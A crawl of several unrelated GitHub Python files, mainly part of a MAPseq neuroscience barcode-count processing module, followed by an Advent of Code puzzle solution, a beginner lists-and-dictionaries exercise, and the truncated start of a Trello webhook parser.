os.path.dirname(filepath)\n \n if outdir is not None:\n dirname = outdir\n \n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename) \n logging.debug(f'handling {filepath} base={base}')\n \n # make raw fasta TSV of barcode-splitter output for one barcode. \n # trim to 44 unique w/ counts. \n seqdf = make_fasta_df(config, filepath)\n of = os.path.join(dirname , f'{base}.44.seq.tsv')\n seqdf.to_csv(of, sep='\\t')\n \n # to calculate threshold we need counts calculated. \n cdf = make_counts_df(config, seqdf, label=base) \n logging.debug(f'initial counts df {len(cdf)} all reads.')\n of = os.path.join(dirname , f'{base}.44.counts.tsv')\n cdf.to_csv(of, sep='\\t')\n dflist.append(cdf)\n logging.debug(f'returning list of {len(dflist)} counts DFs...')\n return dflist \n \n\ndef make_clustered_heatmap(df, outprefix, columns=None ):\n '''\n \n Caller should edit columns in order to exclude injection areas from plot. \n '''\n cmap = 'Reds'\n g = sns.clustermap(df, cmap=cmap, yticklabels=False, col_cluster=False, standard_scale=0)\n g.fig.subplots_adjust(right=0.7)\n g.ax_cbar.set_position((0.8, .2, .03, .4))\n plt.title(f'{outprefix}\\nCounts')\n plt.savefig(f'{outprefix}.heatmap.pdf')\n logging.info(f'done making {outprefix}.heatmap.pdf ')\n \n\ndef make_countsplots(config, filelist ): \n '''\n makes individual read counts plots from 44.counts.tsv files. \n \n ''' \n for bcfile in filelist:\n logging.debug(f'handling {bcfile}')\n filepath = os.path.abspath(bcfile) \n dirname = os.path.dirname(filepath) \n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename)\n base = base.split('.')[0] \n \n bcdata = pd.read_csv(bcfile, sep='\\t')\n plt.figure()\n plt.plot(np.log10(bcdata['Unnamed: 0']), np.log10(bcdata['counts']))\n plt.title(base)\n plt.xlabel(\"log10(BC index)\")\n plt.ylabel(\"log10(BC counts)\")\n plt.savefig(bcfile.replace('tsv', 'pdf'))\n\n\ndef counts_axis_plot_sns(ax, bcdata, labels):\n '''\n Creates individual axes for single plot within figure. 
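\n Plots log10(counts) against log10(rank index) and annotates the axes with site, n (rows),\n top (max count), sum, and threshold taken from the labels dict. 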
\n \n '''\n bcdata['log10index'] = np.log10(bcdata.index)\n bcdata['log10counts'] = np.log10(bcdata['counts'])\n sns.lineplot(ax=ax, x=bcdata['log10index'], y=bcdata['log10counts'] )\n s = bcdata.counts.sum()\n n = len(bcdata)\n t = bcdata.counts.max()\n \n\n title = f\"{bcdata['label'][0]}\" \n ax.set_title(title, fontsize=10)\n ax.text(0.15, 0.2, f\"site={labels['site']}\\nn={n}\\ntop={t}\\nsum={s}\\nthreshold={labels['threshold']}\", fontsize=9) #add text\n \n #sns.move_legend(ax, \"lower left\")\n #ax.set_xlabel(\"log10(BC index)\", fontsize=5)\n #ax.set_ylabel(\"log10(BC counts)\",fontsize=5)\n\n\ndef make_countsplot_combined_sns(config, sampdf, filelist, outdir, expid=None ): \n '''\n makes combined figure with all plots. \n assumes column 'label' for title. \n \n '''\n min_ssi_count = int(config.get('analysis','min_ssi_count')) \n \n from matplotlib.backends.backend_pdf import PdfPages as pdfpages\n \n outfile = 'countsplots.pdf'\n if expid is not None:\n outfile = f'{expid}_{outfile}'\n outfile = os.path.join(outdir, outfile)\n \n # do nine per figure...\n page_dims = (11.7, 8.27)\n with pdfpages(outfile) as pdf:\n #fig_n = math.ceil( math.sqrt(len(filelist)) )\n #fig, axes = plt.subplots(nrows=fig_n, ncols=fig_n, figsize=a4_dims, layout='constrained')\n plots_per_page = 9\n num_figs = float(len(filelist)) / float(plots_per_page)\n if num_figs == int(num_figs):\n num_figs = int(num_figs)\n else:\n num_figs = int(num_figs) + 1\n logging.debug(f'with {plots_per_page} plots/page, need {num_figs} for {len(filelist)} file plots.')\n \n figlist = []\n axlist = []\n for i in range(0,num_figs):\n fig,axes = plt.subplots(nrows=3, ncols=3, figsize=page_dims, layout='constrained') \n if expid is not None:\n fig.suptitle(f'{expid} read counts frequency plots.')\n else:\n fig.suptitle(f'Read counts frequency plots')\n figlist.append(fig)\n # numpy flat iterator doesn't handle indexing\n for a in axes.flat:\n axlist.append(a)\n logging.debug(f'created {len(figlist)} figures to go on {num_figs} pages. ')\n \n #fig.set_xlabel(\"log10(BC index)\")\n #fig.set_ylabel(\"log10(BC counts)\")\n filelist = natsorted(filelist)\n logging.debug(f'handling {len(filelist)} files...') \n for i, bcfile in enumerate(filelist):\n logging.debug(f'handling {bcfile}')\n bcdata = pd.read_csv(bcfile, sep='\\t')\n if len(bcdata) > min_ssi_count:\n (rtprimer_num, site, brain, region ) = guess_site(bcfile, sampdf ) \n count_threshold, label, clength, counts_max, counts_min = calculate_threshold(config, bcdata)\n labels = {'rtprimer':rtprimer_num,\n 'site':site,\n 'brain':brain,\n 'region': region,\n 'threshold' : count_threshold\n }\n \n ax = axlist[i]\n counts_axis_plot_sns(ax, bcdata, labels=labels)\n else:\n ax = axlist[i]\n # make empty axis?\n \n for f in figlist:\n pdf.savefig(f)\n logging.info(f'saved plot PDF to {outfile}')\n \n\n\n\ndef normalize_weight(df, weightdf, columns=None):\n '''\n Weight values in realdf by spikedf\n Assumes matrix index is sequence.\n Assumes matrices have same columns!! \n If column numbers are mis-matched, will create empty column\n If columns is none, use/weight all columns, otherwise ignore unlisted columns\n \n '''\n logging.debug(f'normalizing df=\\n{df}\\nby weightdf=\\n{weightdf}')\n \n # sanity checks, fixes. 
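\n # weighting sketch (hypothetical numbers): spike-in column sums of [200, 100, 50] give\n # factor_array = [1.0, 2.0, 4.0], so counts in weaker-spike columns are scaled up to match\n # the strongest column.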
\n if len(df.columns) != len(weightdf.columns):\n logging.error(f'mismatched matrix columns df:{len(df.columns)} weightdf: {len(weightdf.columns)} !!')\n \n #which SSI has highest spikein?\n sumlist = []\n for col in weightdf.columns:\n colsum = weightdf[col].sum()\n sumlist.append(colsum)\n sum_array = np.array(sumlist)\n maxidx = np.argmax(sum_array)\n maxval = sum_array[maxidx] \n maxcol = weightdf.columns[maxidx]\n logging.debug(f'largest spike sum for {maxcol} sum()={maxval}')\n factor_array = maxval / sum_array\n logging.debug(f'factor array= {list(factor_array)}')\n\n max_list = []\n sum_list = []\n for col in df.columns:\n max_list.append(df[col].max())\n sum_list.append(df[col].sum())\n logging.debug(f'real max_list={max_list}')\n logging.debug(f'real sum_list={sum_list}')\n \n normdf = df.copy()\n for i, col in enumerate(normdf.columns):\n logging.debug(f'handling column {col} idx {i} * factor={factor_array[i]}')\n normdf[col] = (normdf[col] * factor_array[i] ) \n\n max_list = []\n sum_list = []\n for col in normdf.columns:\n max_list.append(normdf[col].max())\n sum_list.append(normdf[col].sum())\n logging.debug(f'norm max_list={max_list}')\n logging.debug(f'norm sum_list={sum_list}')\n\n return normdf\n\n\ndef normalize_scale(df, columns = None, logscale='log2', min=0.0, max=1.0):\n '''\n Log scale whole matrix (log2 or log10).\n Set -inf to 0\n Set NaN to 0\n \n '''\n #logging.debug(f'making rows sum to one...')\n if logscale == 'log2':\n ldf = np.log2(df)\n elif logscale == 'log10':\n ldf = np.log10(df)\n else:\n raise ValueError(f'unknown logscale {logscale}, expected log2 or log10')\n \n for c in ldf.columns:\n ldf[c] = np.nan_to_num(ldf[c], neginf=0.0)\n return ldf\n\n\ndef sync_columns(df1, df2, fillval=0.0):\n '''\n If two DFs don't have same columns, add empty columns to make the same. \n Note columns may be missing in either DF, so number of columns is not enough to compare...\n '''\n x = set(df1.columns)\n y = set(df2.columns)\n w = x.difference(y) # columns to be added to df2\n z = y.difference(x) # columns to be added to df1 \n\n # only process if there is a problem...\n if len(w) > 0 or len(z) > 0:\n logging.debug('mismatched matrix columns, fixing..')\n for c in w:\n df2[c] = fillval\n for c in z:\n df1[c] = fillval\n \n scol = natsorted(list(df1.columns))\n df1 = df1[scol]\n scol = natsorted(list(df2.columns))\n df2 = df2[scol] \n logging.debug(f'df1 col={df1.columns}')\n logging.debug(f'df2 col={df2.columns}') \n else:\n logging.debug('matrix columns match.')\n \n return (df1, df2)\n\n\ndef filter_non_injection(rtdf, ridf, min_injection=1):\n '''\n rtdf and ridf should already be filtered by brain, type, and anything else that might complicate matters.\n remove rows from rtdf that do not have at least min_injection counts in the row \n of ridf with the same index (VBC sequence)\n Does an inner join() on the dataframes, keyed on sequence. \n Keeps values and columns from first argument (rtdf)\n \n '''\n logging.debug(f'before threshold inj df len={len(ridf)}')\n ridf = ridf[ridf.counts >= min_injection]\n ridf.reset_index(inplace=True, drop=True)\n logging.debug(f'after threshold inj df len={len(ridf)}') \n \n mdf = pd.merge(rtdf, ridf, how='inner', left_on='sequence', right_on='sequence')\n incol = mdf.columns\n outcol = []\n selcol =[]\n for c in incol:\n if not c.endswith('_y'):\n selcol.append(c)\n outcol.append(c.replace('_x',''))\n mdf = mdf[selcol]\n mdf.columns = outcol\n logging.debug(f'created merged/joined DF w/ common sequence items. 
df=\\n{mdf}')\n return mdf\n\ndef filter_min_target(df, min_target=1):\n '''\n remove rows with counts below min_target. \n '''\n # body reconstructed to match the inline min_target filtering used in process_merged();\n # the original body was copy-pasted from filter_non_injection() and referenced undefined names.\n logging.debug(f'before min_target={min_target} filtering, df len={len(df)}')\n df = df[df['counts'] >= min_target].copy()\n df.reset_index(inplace=True, drop=True)\n logging.debug(f'after filtering, df len={len(df)}')\n return df \n\n\ndef process_merged(config, filelist, outdir=None, expid=None, recursion=200000, combined_pdf=True, label_column='region' ):\n '''\n takes in combined 'all' TSVs. columns=(sequence, counts, type, label, brain, site) \n outputs brain-specific SSI x target matrix DF, with counts normalized to spikeins by target. \n writes all output to outdir (or current dir). \n \n '''\n from matplotlib.backends.backend_pdf import PdfPages as pdfpages\n sys.setrecursionlimit(recursion) \n \n logging.debug(f'{filelist}')\n \n alldf = merge_tsvs(filelist)\n logging.debug(f'alldf len={len(alldf)}')\n \n cmap = config.get('plots','heatmap_cmap')\n require_injection = config.getboolean('analysis','require_injection')\n min_injection = int(config.get('analysis','min_injection'))\n min_target = int(config.get('analysis','min_target')) \n clustermap_scale = config.get('plots','clustermap_scale') # log10 | log2\n \n if expid is None:\n expid = 'MAPseq'\n \n if outdir is None:\n outdir = './'\n \n outfile = os.path.join(outdir, f'{expid}.all.heatmap.pdf')\n if require_injection:\n outfile = os.path.join(outdir, f'{expid}.all.{min_injection}.{min_target}.{clustermap_scale}.pdf')\n else:\n outfile = os.path.join(outdir, f'{expid}.all.noinj.{min_target}.{clustermap_scale}.pdf')\n logging.debug(f'running exp={expid} min_injection={min_injection} min_target={min_target} cmap={cmap} clustermap_scale={clustermap_scale} ')\n \n # dict to handle return information. 
\n # {\n # B1 : [rbcm, sbcm, nbcm],\n # B2 : [rbcm, sbcm, nbcm]\n # }\n brainlist = {}\n \n \n page_dims = (11.7, 8.27)\n with pdfpages(outfile) as pdf:\n bidlist = list(alldf['brain'].dropna().unique())\n bidlist = [ x for x in bidlist if len(x) > 0 ]\n bidlist.sort()\n logging.debug(f'handling brain list: {bidlist}')\n for brain_id in bidlist:\n valid = True\n logging.debug(f'handling brain_id={brain_id}')\n bdf = alldf[alldf['brain'] == brain_id]\n \n # handle target areas...\n tdf = bdf[bdf['site'].str.startswith('target')]\n rtdf = tdf[tdf['type'] == 'real'] \n\n # threshold by min_target ...\n # or threshold by target-negative\n if min_target > 1:\n before = len(rtdf)\n rtdf = rtdf[rtdf['counts'] >= min_target]\n rtdf.reset_index(inplace=True, drop=True)\n logging.debug(f'filtering by min_target={min_target} before={before} after={len(rtdf)}')\n else:\n logging.debug(f'min_target={min_target} no filtering.')\n \n if require_injection:\n # extract and filter injection areas.\n logging.debug(f'require_injection={require_injection} min_injection={min_injection}') \n idf = bdf[bdf['site'].str.startswith('injection')]\n ridf = idf[idf['type'] == 'real'] \n if len(ridf) == 0:\n logging.warning('require_injection=True but no real VBCs from any injection site.')\n logging.debug(f'{len(rtdf)} real target VBCs before filtering.') \n frtdf = filter_non_injection(rtdf, ridf, min_injection=min_injection)\n logging.debug(f'{len(frtdf)} real target VBCs after injection filtering.')\n if not len(frtdf) > 0:\n logging.warning(f'No VBCs passed injection filtering! Skip brain.')\n valid = False\n else:\n logging.debug(f'require_injection={require_injection} proceeding...')\n frtdf = rtdf\n \n # make matrices. \n if valid: \n rbcmdf = frtdf.pivot(index='sequence',columns=label_column, values='counts')\n scol = natsorted(list(rbcmdf.columns))\n rbcmdf = rbcmdf[scol]\n rbcmdf.fillna(value=0, inplace=True)\n logging.debug(f'brain={brain_id} real barcode matrix len={len(rbcmdf)}')\n \n # spikes\n sdf = tdf[tdf['type'] == 'spike']\n sbcmdf = sdf.pivot(index='sequence', columns=label_column, values='counts')\n spcol = natsorted(list(sbcmdf.columns))\n sbcmdf = sbcmdf[spcol]\n sbcmdf.fillna(value=0, inplace=True) \n logging.debug(f'brain={brain_id} spike barcode matrix len={len(sbcmdf)}')\n \n (rbcmdf, sbcmdf) = sync_columns(rbcmdf, sbcmdf)\n \n nbcmdf = normalize_weight(rbcmdf, sbcmdf)\n logging.debug(f'nbcmdf.describe()=\\n{nbcmdf.describe()}')\n \n # store output. 
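\n # rbcmdf = raw real-VBC counts, sbcmdf = spike-in counts, nbcmdf = spike-normalized counts\n # (matching the .rbcm/.sbcm/.nbcm TSV suffixes written below).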
\n brainlist[brain_id] = [rbcmdf, sbcmdf, nbcmdf]\n \n scbcmdf = normalize_scale(nbcmdf, logscale=clustermap_scale)\n scbcmdf.fillna(value=0, inplace=True)\n logging.debug(f'scbcmdf.describe()=\\n{scbcmdf.describe()}')\n \n rbcmdf.to_csv(f'{outdir}/{brain_id}.rbcm.tsv', sep='\\t')\n sbcmdf.to_csv(f'{outdir}/{brain_id}.sbcm.tsv', sep='\\t') \n nbcmdf.to_csv(f'{outdir}/{brain_id}.nbcm.tsv', sep='\\t')\n scbcmdf.to_csv(f'{outdir}/{brain_id}.scbcm.tsv', sep='\\t')\n \n # check to ensure no columns are missing barcodes.\n droplist = []\n for c in scbcmdf.columns:\n if not scbcmdf[c].sum() > 0:\n logging.warning(f'column {c} for brain {brain_id} has no barcodes, dropping...')\n droplist.append(c)\n logging.debug(f'dropping columns {droplist}')\n scbcmdf.drop(droplist,inplace=True, axis=1 ) \n \n \n try:\n kws = dict(cbar_kws=dict(orientation='horizontal')) \n g = sns.clustermap(scbcmdf, cmap=cmap, yticklabels=False, col_cluster=False, standard_scale=1, **kws)\n #g.ax_cbar.set_title('scaled log10(cts)')\n x0, _y0, _w, _h = g.cbar_pos\n #g.ax_cbar.set_position((0.8, .2, .03, .4))\n g.ax_cbar.set_position([x0, 0.9, g.ax_row_dendrogram.get_position().width, 0.05])\n g.fig.suptitle(f'{expid} {brain_id}')\n g.ax_heatmap.set_title(f'Scaled {clustermap_scale}(counts)')\n plt.savefig(f'{outdir}/{brain_id}.{clustermap_scale}.clustermap.pdf')\n if combined_pdf:\n logging.info(f'saving plot to {outfile} ...')\n pdf.savefig(g.fig)\n except Exception as ee:\n logging.warning(f'Unable to clustermap plot for {brain_id}. Message: {ee}')\n \n logging.info(f'done with brain={brain_id}')\n return brainlist\n\ndef process_merged_new(config, filelist, outdir=None, expid=None, recursion=200000, combined_pdf=True, label_column='region' ):\n '''\n takes in combined 'all' TSVs. columns=(sequence, counts, type, label, brain, site) \n outputs brain-specific SSI x target matrix DF, with counts normalized to spikeins by target. \n writes all output to outdir (or current dir). \n \n '''\n logging.debug(f'{filelist}') \n alldf = merge_tsvs(filelist)\n logging.debug(f'alldf len={len(alldf)}')\n if outdir is None:\n outdir = './'\n\n require_injection = config.getboolean('analysis','require_injection')\n min_injection = int(config.get('analysis','min_injection'))\n min_target = int(config.get('analysis','min_target')) \n use_target_negative = config.getboolean('analysis','use_target_negative')\n cmap = config.get('plots','heatmap_cmap')\n clustermap_scale = config.get('plots','clustermap_scale') # log10 | log2\n \n if expid is None:\n expid = 'MAPseq'\n \n logging.debug(f'running exp={expid} min_injection={min_injection} min_target={min_target} use_target_negative={use_target_negative} ')\n\n bidlist = list(alldf['brain'].dropna().unique())\n bidlist = [ x for x in bidlist if len(x) > 0 ]\n bidlist.sort()\n logging.debug(f'handling brain list: {bidlist}')\n for brain_id in bidlist:\n valid = True\n logging.debug(f'handling brain_id={brain_id}')\n bdf = alldf[alldf['brain'] == brain_id]\n \n # handle target areas...\n tdf = bdf[bdf['site'].str.startswith('target')]\n rtdf = tdf[tdf['type'] == 'real'] \n\n # threshold by min_target or threshold by target-negative\n # if use_target_negative is true, but no target negative site \n # defined, use min_target and throw warning. 
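\n # calc_min_target() returns the largest per-SSI UMI sum seen among 'target-negative' sites\n # for this brain, or 0 if none are present.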
\n if use_target_negative:\n min_target = calc_min_target(config, bdf)\n if min_target != 0:\n logging.debug(f'non-zero target-negative UMI count = {min_target}')\n\n if min_target > 1:\n before = len(rtdf)\n rtdf = rtdf[rtdf['counts'] >= min_target]\n rtdf.reset_index(inplace=True, drop=True)\n logging.debug(f'filtering by min_target={min_target} before={before} after={len(rtdf)}')\n else:\n logging.debug(f'min_target={min_target} no filtering.')\n \n if require_injection:\n # extract and filter injection areas.\n logging.debug(f'require_injection={require_injection} min_injection={min_injection}') \n idf = bdf[bdf['site'].str.startswith('injection')]\n ridf = idf[idf['type'] == 'real'] \n if len(ridf) == 0:\n logging.warning('require_injection=True but no real VBCs from any injection site.')\n logging.debug(f'{len(rtdf)} real target VBCs before filtering.') \n frtdf = filter_non_injection(rtdf, ridf, min_injection=min_injection)\n logging.debug(f'{len(frtdf)} real target VBCs after injection filtering.')\n if not len(frtdf) > 0:\n logging.warning(f'No VBCs passed injection filtering! Skip brain.')\n valid = False\n else:\n logging.debug(f'require_injection={require_injection} proceeding...')\n frtdf = rtdf\n \n # make matrices. \n if valid: \n rbcmdf = frtdf.pivot(index='sequence',columns=label_column, values='counts')\n scol = natsorted(list(rbcmdf.columns))\n rbcmdf = rbcmdf[scol]\n rbcmdf.fillna(value=0, inplace=True)\n logging.debug(f'brain={brain_id} real barcode matrix len={len(rbcmdf)}')\n # spikes\n sdf = tdf[tdf['type'] == 'spike']\n sbcmdf = sdf.pivot(index='sequence', columns=label_column, values='counts')\n spcol = natsorted(list(sbcmdf.columns))\n sbcmdf = sbcmdf[spcol]\n sbcmdf.fillna(value=0, inplace=True) \n logging.debug(f'brain={brain_id} spike barcode matrix len={len(sbcmdf)}')\n \n (rbcmdf, sbcmdf) = sync_columns(rbcmdf, sbcmdf)\n \n nbcmdf = normalize_weight(rbcmdf, sbcmdf)\n logging.debug(f'nbcmdf.describe()=\\n{nbcmdf.describe()}')\n scbcmdf = normalize_scale(nbcmdf, logscale=clustermap_scale)\n scbcmdf.fillna(value=0, inplace=True)\n logging.debug(f'scbcmdf.describe()=\\n{scbcmdf.describe()}')\n \n rbcmdf.to_csv(f'{outdir}/{brain_id}.rbcm.tsv', sep='\\t')\n sbcmdf.to_csv(f'{outdir}/{brain_id}.sbcm.tsv', sep='\\t') \n nbcmdf.to_csv(f'{outdir}/{brain_id}.nbcm.tsv', sep='\\t')\n scbcmdf.to_csv(f'{outdir}/{brain_id}.scbcm.tsv', sep='\\t')\n \n # check to ensure no columns are missing barcodes.\n droplist = []\n for c in scbcmdf.columns:\n if not scbcmdf[c].sum() > 0:\n logging.warning(f'column {c} for brain {brain_id} has no barcodes, dropping...')\n droplist.append(c)\n logging.debug(f'dropping columns {droplist}')\n scbcmdf.drop(droplist,inplace=True, axis=1 ) \n \n \n try:\n kws = dict(cbar_kws=dict(orientation='horizontal')) \n g = sns.clustermap(scbcmdf, cmap=cmap, yticklabels=False, col_cluster=False, standard_scale=1, **kws)\n #g.ax_cbar.set_title('scaled log10(cts)')\n x0, _y0, _w, _h = g.cbar_pos\n #g.ax_cbar.set_position((0.8, .2, .03, .4))\n g.ax_cbar.set_position([x0, 0.9, g.ax_row_dendrogram.get_position().width, 0.05])\n g.fig.suptitle(f'{expid} {brain_id}')\n g.ax_heatmap.set_title(f'Scaled {clustermap_scale}(counts)')\n plt.savefig(f'{outdir}/{brain_id}.{clustermap_scale}.clustermap.pdf')\n if combined_pdf:\n # NOTE: no PdfPages context is opened in this variant, so combined-PDF output\n # is deferred; see process_merged() / make_merged_plots_new().\n logging.debug(f'combined_pdf={combined_pdf} requested; combined output not written here.')\n except Exception as ee:\n logging.warning(f'Unable to clustermap plot for {brain_id}. 
Message: {ee}')\n \n logging.info(f'done with brain={brain_id}')\n\ndef make_merged_plots_new(config, outdir=None, expid=None, recursion=200000, combined_pdf=True, label_column='region' ):\n '''\n consume barcode matrices and create heatmap plots.\n '''\n\n\n\ndef process_qc(config, exp_dir ):\n '''\n consume files in standard directories and generate qc stats and analysis report..\n \n '''\n pass\n\n\ndef process_mapseq_dir(exp_id, loglevel, force):\n '''\n \n process_fastq.py -d/-v -force -b barcode_v2..txt -s _sampleinfo.jrh.xlsx -O fastq.out fastq/*.fastq* \n process_ssifasta.py -d/-v -s _sampleinfo.jrh.xlsx -o .all.tsv -O ssi.out \n process_merged.py -d/-v -e --combined -s _sampleinfo.jrh.xlsx -O merged.out \n \n ''' \n d = os.path.abspath(exp_id)\n if not os.path.exists(d):\n sys.exit(f'Experiment directory {d} does not exist.')\n\n logging.info(f'processing experiment dir: {d}')\n \n config = get_default_config()\n expconfig = f'{d}/mapseq.conf'\n\n if os.path.exists(expconfig):\n config.read(expconfig)\n logging.debug(f'read {expconfig}')\n \n \n try:\n samplefile = f'{d}/{exp_id}_sampleinfo.jrh.xlsx'\n sampdf = load_sample_info(config, samplefile)\n rtlist = get_rtlist(sampdf)\n \n outdir = f'{d}/fastq.out'\n bcfile = f'{d}/barcode_v2.{exp_id}.txt' \n bclist = load_barcodes(config, bcfile, labels=rtlist, outdir=outdir)\n readfilelist = package_pairfiles( glob.glob(f'{d}/fastq/*.fastq*'))\n\n logging.info(f'running process_fastq_pairs. readfilelist={readfilelist} outdir={outdir}')\n process_fastq_pairs(config, readfilelist, bclist, outdir, force=False)\n \n \n #process_ssifasta(config, infile, outdir=None, site=None)\n #process_merged(config, filelist, outdir=None, expid=None, recursion=100000, combined_pdf=True)\n #process_qc(config, exp_dir)\n\n except Exception as ex:\n logging.error(f'error while handling {d} ')\n logging.warning(traceback.format_exc(None))\n \n\n\n\n","repo_name":"ZadorLaboratory/mapseq-processing","sub_path":"mapseq/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":66783,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"73591138490","text":"from Utils import *\n\n# Part 1\n\ninp = rdl(\"22.txt\")[2:]\n\n# inp = \"\"\"Filesystem Size Used Avail Use%\n# /dev/grid/node-x0-y0 10T 8T 2T 80%\n# /dev/grid/node-x0-y1 11T 6T 5T 54%\n# /dev/grid/node-x0-y2 32T 28T 4T 87%\n# /dev/grid/node-x1-y0 9T 7T 2T 77%\n# /dev/grid/node-x1-y1 8T 0T 8T 0%\n# /dev/grid/node-x1-y2 11T 7T 4T 63%\n# /dev/grid/node-x2-y0 10T 6T 4T 60%\n# /dev/grid/node-x2-y1 9T 8T 1T 88%\n# /dev/grid/node-x2-y2 9T 6T 3T 66%\"\"\".split('\\n')[1:]\n\n\nnodes_data = [x.split(' ')[0] for x in inp]\nnode_loc = [n.split('-')[1:] for n in nodes_data]\n\ncoords = [(int(x[0][1:]), int(x[1][1:])) for x in node_loc]\n\nused = [int(x.split()[2][:-1]) for x in inp]\navail = [int(x.split()[3][:-1]) for x in inp]\n\ncount = 0\nfor a in range(len(inp)):\n for b in range(len(inp)):\n if a != b:\n if used[a] > 0 and used[a] <= avail[b]:\n count += 1\n\nprint(count)\n\n# 5:40 (10th)\n\nnodes = dict()\nfor i in range(len(coords)):\n nodes[coords[i]] = [used[i], avail[i]]\n\n\n# def get_moves(nodes, x_size, y_size):\n# moves = []\n# for n in nodes:\n# x1, y1 = n\n#\n# for x2 in range(x1 - 1, x1 + 2):\n# for y2 in range(y1 - 1, y1 + 2):\n# if 0 <= x2 <= x_size:\n# if 0 <= y2 <= y_size:\n# if not (x1 == x2 and y1 == y2):\n# if abs(x2 - x1) + abs(y2 - y1) == 1:\n# if nodes[(x2, y2)][1] >= nodes[n][0] > 0:\n# # Move data from x1, y1 to x2, y2\n# 
new_nodes = copy.deepcopy(nodes)\n# move_size = new_nodes[n][0]\n#\n# avail_change = move_size\n# if move_size % 1 != 0:\n# avail_change += 0.5\n#\n# new_nodes[n][0] = 0\n# new_nodes[n][1] += avail_change\n#\n# new_nodes[(x2, y2)][0] += move_size\n# new_nodes[(x2, y2)][1] -= avail_change\n#\n# moves.append(new_nodes)\n# return moves\n#\n#\n# def bfs():\n# x_size = max([n[0] for n in nodes])\n# y_size = max([n[1] for n in nodes])\n# nodes[x_size, 0][0] -= 0.5\n# goal = nodes[x_size, 0][0]\n#\n# # Get all available moves\n# queue = [[nodes]]\n# visited = set()\n# visited.add(json.dumps(list(nodes.items())))\n#\n# i = 0\n# while queue:\n# path = queue.pop(0)\n#\n# curr_nodes = path[-1]\n#\n# if curr_nodes[(0, 0)][0] == goal:\n# return len(path) - 1\n#\n# moves = get_moves(curr_nodes, x_size, y_size)\n#\n# for move in moves:\n# if json.dumps(list(move.items())) in visited:\n# continue\n#\n# visited.add(json.dumps(list(move.items())))\n# new_path = list(path)\n# new_path.append(move)\n# queue.append(new_path)\n# i += 1\n# if i % 100 == 0:\n# print(i, len(path))\n#\n# return 'No path found!'\n#\n#\n# print(bfs())\n\nfor y in range(31):\n z = ''\n for x in range(32):\n if nodes[(x, y)][0] == 0:\n z += '0 '\n elif nodes[(x, y)][0] < 150:\n z += '. '\n else:\n z += '# '\n print(z)\n\n# 1:32:20 (>100th)\n","repo_name":"bjebert/adventofcode","sub_path":"2016/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18516173119","text":"first_favorite_food=\"chocolate\"\nsecond_favorite_food=\"cookies\"\nthird_favorite_food=\"salad\"\nforth_favorite_food=\"cherries\"\nfifth_favorite_food=\"chicken\"\n\nfav_foods = [\"chocolate\" , \"cookies\" , \"salad\" , \"cherries\" , \"chicken\"]\n# search the list, add to it, categorize it, move them around, get length of list, change/remove an item \n# CRUD = create, read, update, delete\n\nprint(fav_foods[4]) \n\n#updatesmth in the list\nprint(fav_foods[2])\nfav_foods[2]=\"chicken\"\nprint(fav_foods[2])\n\n#include smth in the list\nfav_foods.append(\"brownies\")\nprint(fav_foods)\n\nfor food in fav_foods:\n print(\"I sure do love \" + food + \"!\")\n \n# dstamp1=[\"Derek\",\"Stampone\",30,\"Brown\",\"Brown\",5.7,185,8,True]\n# dstamp1_firstname=dstamp[0] \n\n ##key:value. 
called a dictionary (dict)\n# dstamp1 = {\"firstname\": \"Derek\",\n# \"lastname\": \"Stampone\"\n# \"age\": 30,\n# \"eyecolor\": \"Brown\",\n# \"haircolor\": \"Brown\",\n# \"height\": 5.8,\n# \"weight\": 185,\n# \"lucky_number\": 8,\n# \"registed_to_vote?\": True\n# }\n\n# print(dstamp1[\"lucky_number\"])\n# dstamp1[\"lucky_number\"]=7\n# dstamp1[\"ethnicity\"]=\"white\" #updates/adds to the key\n# print(dstamp1)\n\nsuperheroes = {\n \"jeff\": \"Rogue\",\n \"deanna\": \"Jessica Jones\",\n \"danny\": \"Static Shock\",\n \"ash\": \"Supergirl\",\n \"derek\": \"The Hulk\"\n}\n\nsuperheroes[\"Mary\"]=\"wonder woman\"\n\nfor person in superheroes:\n print(person)\n \nfor person in superheroes:\n print(superheroes[person])\n \nfor x in range(1,101):\n print(x)\n \nfor x in range(1,101):\n if x%2==0:\n print(x)\n \nfor x in range(1,1000000): \n if x**2 < 1000000:\n print(x**2)\n ### below is a LIST of dictionaries not a dictionary \nactors = [\n {\"name\": \"Molly Ringwald\", \"role\": \"Claire Standish\", \"grade\": 10},\n {\"name\": \"Judd Nelson\", \"role\": \"John Bender\", \"grade\": 12},\n {\"name\": \"Ally Sheedy\", \"role\": \"Allison Reynolds\", \"grade\": 11},\n {\"name\": \"Anthony Michael Hall\", \"role\": \"Brian Johnson\", \"grade\": 10}\n]\n\nprint(actors[2][\"name\"])\nprint(actors[3][\"role\"])\nprint(len(actors))\n\nfor people in actors:\n print(\"The role of \" + people[\"role\"] + \" was played by \" + people[\"name\"])\n","repo_name":"miriamshapir/leapyeartestcode","sub_path":"environment/day-3/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17081948582","text":"from trello import TrelloClient\n\nfrom matterllo.hook.card import Hook as HookCard\nfrom matterllo.hook.list import Hook as HookList\nfrom matterllo.hook.checklist import Hook as HookChecklist\nfrom matterllo.utils import logger\nfrom matterllo.utils import config\n\nLOGGING = logger()\nSETTINGS = config()\n\n\nclass Parser(HookCard, HookList, HookChecklist):\n\n def __init__(self):\n self.supported_action = HookCard.actions() + HookList.actions() + HookChecklist.actions()\n self.trello_client = TrelloClient(api_key=SETTINGS['trello_api_key'], token=SETTINGS['trello_api_token'])\n\n def __call__(self, action):\n \"\"\" Parse the event/action and return a pretty output.\n\n Args:\n action (dict): the trello action data.\n \"\"\"\n try:\n action_type = action['type']\n if action_type not in self.supported_action:\n raise NotImplementedError(action_type)\n\n action_parser = getattr(self, action_type)\n return action_parser(action=action)\n except NotImplementedError as e:\n LOGGING.info('action parsing not implemented :: {}'.format(e))\n except Exception as e:\n LOGGING.error('unable to parse the action :: {} :: {}'.format(e, 